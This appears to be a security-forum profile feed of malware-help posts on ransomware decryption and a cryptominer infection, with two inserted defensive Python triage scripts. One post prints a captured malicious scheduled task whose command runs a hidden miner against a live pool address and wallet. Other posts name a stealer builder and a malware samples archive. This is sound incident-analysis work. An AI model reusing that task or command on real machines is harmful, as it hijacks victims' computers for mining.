Posts: 111
Joined
Days Won: 1
safety last won the day on July 9 2023
safety had the most liked content!
About safety
Rank: Newbie
Profile Information
Gender: Male
Location: Russia
Interests: forum.esetnod32.ru
Recent Profile Visitors: 1,298 profile views
-
Nightowl reacted to a post in a topic: I got ransomware attacked in 2016, I have the files, how to decrypt them?
-
itman reacted to a post in a topic: I got ransomware attacked in 2016, I have the files, how to decrypt them?
-
I think the decryption of your mp3 files using esetteslacryptdecryptor.exe was correct, but there is also a second layer of encryption, and this, unfortunately, is Cryptowall 3, judging by the first 16 bytes at the beginning of each file after decryption (the first 16 bytes are the same for all files): 723800F3740E5CF011BDB7F6EE44EC63
-
Judging by the README.txt file from TeslaDecoder ("TeslaCrypt 3.0.0 - 3.0.1 (.xxx, .ttt., .micro), 4.0+ (as original)"), *.mp3 also applies to the TeslaCrypt v3 version. It would be a good idea on your part to provide several encrypted mp3 files + logs from the esetteslacryptdecryptor.exe program to see what result is obtained after the decryption process is completed. For example: it was possible that there was double encryption of 3.0 and 4.0 in some order, and the decryptor had to be run twice to decrypt each of the encryption layers. If the first layer of encryption was Cryptowall 3.0, then it will not be possible to completely decrypt the file. But all this needs to be checked after you provide the necessary files (preferably 3-4).
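As an added example (not part of the thread above, and not from ESET or TeslaDecoder), here is a small Python triage script for the check described in these two posts: read the first 16 bytes of each decrypted file and see whether all of them share one fixed header, which is the sign that another encryption layer is still in place. The sample files, their names and the 16-byte header they are given are constructed for the demo; the only value taken from the thread is the header hex quoted in the first post, kept as a lookup entry so the script can label a match with the poster's attribution.

```python
"""Triage check for a leftover encryption layer: do all decrypted files
share the same leading bytes? (Added example, not from the thread.)"""
import os
import tempfile

HEADER_LEN = 16

# Header value quoted in the post above; the label repeats the poster's
# attribution and is not an independently verified signature.
KNOWN_HEADERS = {
    "723800F3740E5CF011BDB7F6EE44EC63": "header the post above attributes to Cryptowall 3",
}


def common_prefix(blobs, length=HEADER_LEN):
    """Return the `length` leading bytes shared by every blob, or None when
    the blobs differ, the list is empty, or any blob is shorter than `length`."""
    heads = {b[:length] for b in blobs}
    if len(heads) != 1:
        return None
    head = heads.pop()
    return head if len(head) == length else None


def check_files(paths, length=HEADER_LEN):
    """Read the leading bytes of each file; return the shared header as
    upper-case hex, or None if the files do not share one."""
    blobs = []
    for path in paths:
        with open(path, "rb") as fh:
            blobs.append(fh.read(length))
    head = common_prefix(blobs, length)
    return head.hex().upper() if head else None


def describe(header_hex):
    """Map a shared header (or None) to a human-readable verdict."""
    if header_hex is None:
        return "no common header: files do not look like a single leftover encryption layer"
    label = KNOWN_HEADERS.get(header_hex, "unknown fixed header; compare with other samples")
    return f"all files start with {header_hex}: {label}"


def demo():
    """Write three constructed files that share a constructed header and run
    the check on them; returns the hex the check reports."""
    header = bytes.fromhex("00112233445566778899AABBCCDDEEFF")  # constructed value
    with tempfile.TemporaryDirectory() as tmp:
        paths = []
        for i in range(3):
            path = os.path.join(tmp, f"sample{i}.mp3")  # constructed file name
            with open(path, "wb") as fh:
                fh.write(header + os.urandom(64))
            paths.append(path)
        return check_files(paths)


if __name__ == "__main__":
    print(describe(demo()))
```

Run it against the real decrypted files by passing their paths to check_files; a shared header across files of different original content is what you would not expect from correctly decrypted media, so it is a quick way to confirm the "second layer" hypothesis before sending samples on.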
-
safety changed their profile photo
-
Nightowl reacted to a post in a topic: Pc infected with cyberfear@decryptor, SEXAXGLSY files
-
Pc infected with cyberfear@decryptor, SEXAXGLSY files
safety replied to marc1200's topic in Malware Finding and Cleaning
1.5 years after the leak, the builder began to work smarter, but at first the folder with the builder files remained on the disk. Some of the attackers do not change the private key for a long time (decryptor), and after redeeming the key there is a chance to help other victims.
>>>> Your personal DECRYPTION ID: 0D4726C60545E66F7A63330CE76CDAF9
>>>> Your personal DECRYPTION ID: 0D4726C60545E66F4343434343434343
>>>> Your personal DECRYPTION ID: 0D4726C60545E66FEFE02D17117DDA22
>>>> Your personal DECRYPTION ID: 0D4726C60545E66F7A63330CE76CDAF9
-
Pc infected with cyberfear@decryptor, SEXAXGLSY files
safety replied to marc1200's topic in Malware Finding and Cleaning
If the builder was launched on the victim's device, you need to look for these files on the disk, possibly among deleted files. As a result, all the necessary tools for encryption and decryption are automatically created in the *\Build folder:
DECRYPTION_ID.txt
LB3.exe
LB3Decryptor.exe
LB3_pass.exe
LB3_ReflectiveDll_DllMain.dll
LB3_Rundll32.dll
LB3_Rundll32_pass.dll
Password_dll.txt
Password_exe.txt
priv.key
pub.key
Here the LB3.exe file is enough for encryption, and LB3Decryptor.exe or priv.key for decryption.
-
Dear Colleagues! Is it possible to decrypt a *.dat file paired with mobsync.dll/evntagnt.dll? Presumably this file may contain a config for the task, with the help of which the miner is launched from a folder with an arbitrary name. For example:
RescueSwift-fc4b811c-e35f-4a8d-a903-db85344b9d7f
PicturePerfect-d2f4adbc-5e35-42fd-bfe5-bbdf187ada08
ExpressEditor-22b9dab3-7036-45b3-9fda-b264e8491726
BoltDownloader-e1648eb4-dcd2-4e6d-b19a-7fc96278e3b5
and others.
The miner launch chain looks like this (captured via Universal Virus Sniffer):
Полное имя C:\WINDOWS\SYSWOW64\SVCHOST.EXE
Имя файла SVCHOST.EXE
Тек. статус АКТИВНЫЙ ПРОВЕРЕННЫЙ сервис в автозапуске
Фильтр Удовлетворяет критериям THREADS IN PROCESSES (ПРЕДУПРЕЖДЕНИЕ ~ ОБНАРУЖЕН ВНЕДРЕННЫЙ ПОТОК В ПРОЦЕССЕ)(1) [filtered (0)]
Сохраненная информация на момент создания образа
Статус АКТИВНЫЙ ПРОВЕРЕННЫЙ сервис в автозапуске
Процесс 32-х битный
File_Id 768582FAD000
Linker 14.20
Размер 46544 байт
Создан 27.11.2023 в 13:19:16
Изменен 27.11.2023 в 13:19:16
TimeStamp 04.01.2033 в 14:21:46
EntryPoint +
OS Version 10.0
Subsystem Windows graphical user interface (GUI) subsystem
IMAGE_FILE_DLL -
IMAGE_FILE_EXECUTABLE_IMAGE +
Тип файла 32-х битный ИСПОЛНЯЕМЫЙ
Цифр. подпись Действительна, подписано Microsoft Windows Publisher
Оригинальное имя svchost.exe.mui
Версия файла 10.0.19041.1 (WinBuild.160101.0800)
Описание Хост-процесс для служб Windows
Производитель Microsoft Corporation
Доп. информация на момент обновления списка
pid = 4092 NT AUTHORITY\СИСТЕМА
CmdLine C:\Windows\SysWOW64\svchost.exe -k DcomLaunch -s EvntAgntSvc_daa0aa
Процесс создан 13:01:43 [2023.12.03]
С момента создания 00:01:21
CPU 0,09%
CPU (1 core) 1,10%
parentid = 948 C:\WINDOWS\SYSTEM32\SERVICES.EXE
Предупреждение (!)
ПРЕДУПРЕЖДЕНИЕ: Обнаружен внедренный поток в процессе C:\WINDOWS\SYSWOW64\SVCHOST.EXE [4092], tid=5376
Создание задачи \Task-b4045877-4506-4217-974f-7ca9dc3da345_Vl pid = 4092 NT AUTHORITY\СИСТЕМА
TaskXML
<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="hxxp://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo>
    <URI>\Task-b4045877-4506-4217-974f-7ca9dc3da345_Vl</URI>
  </RegistrationInfo>
  <Triggers>
    <RegistrationTrigger id="Trigger1">
      <EndBoundary>2023-12-03T13:02:54</EndBoundary>
      <Enabled>true</Enabled>
      <Delay>PT25S</Delay>
    </RegistrationTrigger>
  </Triggers>
  <Principals>
    <Principal id="Author">
      <UserId>S-1-5-21-3326377353-2303841640-77764357-1003</UserId>
      <RunLevel>HighestAvailable</RunLevel>
      <LogonType>InteractiveToken</LogonType>
    </Principal>
  </Principals>
  <Settings>
    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
    <AllowHardTerminate>true</AllowHardTerminate>
    <StartWhenAvailable>true</StartWhenAvailable>
    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
    <IdleSettings>
      <Duration>PT10M</Duration>
      <WaitTimeout>PT1H</WaitTimeout>
      <StopOnIdleEnd>true</StopOnIdleEnd>
      <RestartOnIdle>false</RestartOnIdle>
    </IdleSettings>
    <AllowStartOnDemand>true</AllowStartOnDemand>
    <Enabled>true</Enabled>
    <Hidden>false</Hidden>
    <RunOnlyIfIdle>false</RunOnlyIfIdle>
    <WakeToRun>false</WakeToRun>
    <ExecutionTimeLimit>PT72H</ExecutionTimeLimit>
    <DeleteExpiredTaskAfter>PT0S</DeleteExpiredTaskAfter>
    <Priority>7</Priority>
  </Settings>
  <Actions Context="Author">
    <Exec>
      <Command>C:\ProgramData\TileDataNetwork-ba00c230-6183-4f3e-944f-35140b43215a\TileDataNetwork.exe</Command>
      <Arguments>--create --algo 144_5 --pers BgoldPoW -i 99 --server 185.180.230.136:8080 --user ARRLXmqTUQrpjcN7P7xnnx1K1gfHQbCTiJ.Zephyr -w 0</Arguments>
    </Exec>
  </Actions>
</Task>
Время 13:01:49 [2023.12.03]
parentid = 948 C:\WINDOWS\SYSTEM32\SERVICES.EXE
SHA1 53C010F3CC328D4764359DA02D209750E4616BB4
MD5 BBFF42F3C7E8FC0E3049F6F88FBB88E2
Ссылки на объект
Ссылка HKLM\System\CurrentControlSet\Services\EvntAgntSvc_daa0aa\ImagePath
ImagePath %SystemRoot%\SysWOW64\svchost.exe -k DcomLaunch
DisplayName EvntAgnt_999b80
Description Event Translator SNMP subagent
EvntAgntSvc_daa0aa тип запуска: Авто (2)
Изменен 27.11.2023 в 12:21:35
Образы EXE и DLL
SVCHOST.EXE C:\WINDOWS\SYSWOW64
Загруженные DLL НЕИЗВЕСТНЫЕ
EVNTAGNT.DLL C:\WINDOWS\SYSWOW64
--------------------
Here is the task (TaskXML <?xml version="1.0" encoding="UTF-16"?>) created after the service starts: C:\Windows\SysWOW64\svchost.exe -k DcomLaunch -s EvntAgntSvc_daa0aa
Presumably, this is the task that is extracted from the *.dat file. After creating the task, the miner is launched from the preinstalled folder, in this case from C:\ProgramData\TileDataNetwork-ba00c230-6183-4f3e-944f-35140b43215a
Execution block:
<Exec>
  <Command>C:\ProgramData\TileDataNetwork-ba00c230-6183-4f3e-944f-35140b43215a\TileDataNetwork.exe</Command>
  <Arguments>--create --algo 144_5 --pers BgoldPoW -i 99 --server 185.180.230.136:8080 --user ARRLXmqTUQrpjcN7P7xnnx1K1gfHQbCTiJ.Zephyr -w 0</Arguments>
</Exec>
There are three different pairs in the archives, collected from different cases.
Archive password - "infected" (without quotes)
Samples.rar
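As an added example, not from the post above and not from Universal Virus Sniffer, the following Python script parses a Task Scheduler XML definition of the kind quoted in the post and flags Exec actions that run a binary out of a user-writable folder such as C:\ProgramData with miner-style command-line switches. The two task files embedded in the script are constructed (placeholder GUIDs, folder name, pool address and wallet); the namespace URI is the genuine Task Scheduler schema (the post shows it defanged as hxxp://), and the switch and directory lists are assumptions chosen for this demo.

```python
"""Flag miner-style Exec actions in Windows Task Scheduler XML.
(Added example; not from the post above or from Universal Virus Sniffer.)"""
import xml.etree.ElementTree as ET

# Genuine Task Scheduler schema namespace, as used in the quoted task.
TASK_NS = "{http://schemas.microsoft.com/windows/2004/02/mit/task}"

# Assumptions for this demo: switches common to command-line mining software,
# and directories from which a scheduled task should rarely run a binary.
MINER_SWITCHES = ("--algo", "--server", "--user", "--pers", "--pool", "stratum+tcp://")
WRITABLE_DIRS = ("c:\\programdata\\", "\\appdata\\local\\temp\\", "c:\\users\\public\\")


def _text(parent, tag):
    """Text of child <tag> under parent, or '' when parent or child is missing."""
    node = parent.find(TASK_NS + tag) if parent is not None else None
    return (node.text or "").strip() if node is not None else ""


def triage_task_xml(raw):
    """Parse one task definition and return a finding per suspicious <Exec>.

    `raw` is the task file as bytes; Task Scheduler writes UTF-16 with a BOM,
    which expat detects on its own, so no manual decoding is needed.
    """
    root = ET.fromstring(raw)
    uri = _text(root.find(TASK_NS + "RegistrationInfo"), "URI")
    run_level = _text(root.find(f"{TASK_NS}Principals/{TASK_NS}Principal"), "RunLevel")
    findings = []
    for exec_node in root.iter(TASK_NS + "Exec"):
        command = _text(exec_node, "Command")
        args = _text(exec_node, "Arguments")
        reasons = []
        if any(d in command.lower() for d in WRITABLE_DIRS):
            reasons.append("binary runs from a user-writable directory")
        hits = [s for s in MINER_SWITCHES if s in args.lower()]
        if hits:
            reasons.append("miner-style arguments: " + ", ".join(hits))
        if reasons and run_level == "HighestAvailable":
            reasons.append("task also requests RunLevel HighestAvailable")
        if reasons:
            findings.append({"task": uri, "command": command, "reasons": reasons})
    return findings


# Constructed task in the shape of the one quoted above; GUIDs, folder name,
# pool host and wallet are placeholders, not values from any real case.
SUSPICIOUS_TASK = r"""<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\Task-00000000-0000-0000-0000-000000000000_Vl</URI></RegistrationInfo>
  <Principals><Principal id="Author"><RunLevel>HighestAvailable</RunLevel></Principal></Principals>
  <Actions Context="Author">
    <Exec>
      <Command>C:\ProgramData\ExampleApp-00000000-0000-0000-0000-000000000000\ExampleApp.exe</Command>
      <Arguments>--create --algo EXAMPLE --server pool.example.invalid:8080 --user WALLET_PLACEHOLDER -w 0</Arguments>
    </Exec>
  </Actions>
</Task>""".encode("utf-16")

# Constructed benign task for contrast: system binary, least privilege.
BENIGN_TASK = r"""<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\Microsoft\Windows\ExampleMaintenance</URI></RegistrationInfo>
  <Principals><Principal id="Author"><RunLevel>LeastPrivilege</RunLevel></Principal></Principals>
  <Actions Context="Author">
    <Exec>
      <Command>C:\Windows\System32\example.exe</Command>
      <Arguments>/quiet</Arguments>
    </Exec>
  </Actions>
</Task>""".encode("utf-16")


if __name__ == "__main__":
    for name, blob in (("suspicious", SUSPICIOUS_TASK), ("benign", BENIGN_TASK)):
        print(name, triage_task_xml(blob))
```

On a live system the same function can be pointed at each file under C:\Windows\System32\Tasks (read in binary mode); the combination of a ProgramData path, pool-style arguments and HighestAvailable is what makes the quoted task stand out, and the script reports each of those signals separately so a false positive on one of them is easy to spot.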
-
safety reacted to a post in a topic: Customer satisfaction survey 2023
-
With a high probability, this was a STOP (DJVU) ransomware attack. If the files on your device did not change the extension to *.miqe, then the attack was successfully repulsed. Most likely, ESET reacted to the ransom note.
Time;Scan Engine;Object Type;Object;Detection;Action;User;Info;Hash;First Detection Here
2023/07/26 15:08:15;Real-time file system protection;file;E:\files\_readme.txt;MSIL/Filecoder.ANG trojan;removed;**\safety;Event occurred in a file modified by an application : C:\Program Files (x86)\Total Commander\TOTALCMD64.EXE (05BF026F5834567EEF2711B0E9F980E36C9C8C13).;6FFE53DAFEA78BF7D01D23B2B5F75B226AB84797;12.06.2023 20: 09:37
-
itman reacted to a post in a topic: Eset VS Miner
-
In general, on technical forums in Russia and apparently in Ukraine, the topic of this miner ("REALTEKD / TASKHOSTW") over the past few years can be compared in popularity only with the Stop Djvu encryptor (but there at least the file extension changes consistently, whereas here practically nothing changes). Many antiviruses are taken out and blocked, not only ESET. In both cases, the infection occurs as a result of the use of hacked programs. The installer with this miner, as a rule, is several GB, and there is no way to check it for viruses. In addition to blocking the launch of installers and utilities and blocking standard installation paths for anti-virus programs, access to the sites of technical forums and anti-virus companies is also blocked.
-
safety reacted to a post in a topic: Detecting of malicious scripts *.py in the .unitypackage files
-
safety reacted to a post in a topic: Detecting of malicious scripts *.py in the .unitypackage files
-
Dear colleagues, is it possible in ESET products to detect malicious *.py scripts in .unitypackage files (a compressed package created by Unity, a 3D game development program, which contains access to the project and library files used to build a game)? To create such scripts, for example, the Hawkish-Grabber builder can be used; the script can then be added to the .unitypackage file, and it is executed automatically when the Unity application opens this file.
-
Nightowl reacted to a post in a topic: Is it possible to decrypt files for modified FONIX/RYUK?
-
Nightowl reacted to a post in a topic: Is it possible to decrypt files for modified FONIX/RYUK?
-
Is it possible to decrypt files for modified FONIX/RYUK?
safety replied to safety's topic in Malware Finding and Cleaning
Reinstalling the system may affect the investigation of the incident, but in order to analyze "whether or not decryption of files is possible", the user transferred everything that was needed: encrypted files, the body of the encryptor, a ransom note, additional files, from which it was previously possible to restore the key. DrWeb requirements are quite strict: free decryption is possible if the user has a license for the DrWeb product, if the product has been installed, updated and skipped the encryptor file. Nothing is known about the presence of FONIX decryption in DrWeb; Bitdef used cpriv.key (i.e. key file) previously, Gillespie (Emsisoft) also wrote about the need for a key file to decrypt FONIX, Avast uses a key file (cpriv.key, hrmlog1) to restore the session private key and then decrypt the files, Kaspersky receives the session key and adds it to the Rakhni public decryptor.
-
Is it possible to decrypt files for modified FONIX/RYUK?
safety replied to safety's topic in Malware Finding and Cleaning
This user is not under sanctions:
WebClientComputerName, *.almaty.*.kz
LicensePartnerCountry, KZ
--------
I don't think it would be convenient to say in this thread why Kaspersky is stronger than DrWeb or vice versa.
-
Is it possible to decrypt files for modified FONIX/RYUK?
safety replied to safety's topic in Malware Finding and Cleaning
This is a fresh wave of FONIX, somewhere from the beginning of June. The previous wave was in January-March of this year. Most likely hacked by RDP. The antivirus was installed after encryption.
-
Is it possible to decrypt files for modified FONIX/RYUK?
safety replied to safety's topic in Malware Finding and Cleaning
@itman, the key file cpriv.key was in the Fonix/XINOF variants; for Fonix/RYUK this file is called hrmlog1. Unfortunately, with the current version of FONIX / RYK, the previously known decoders do not work. Alas.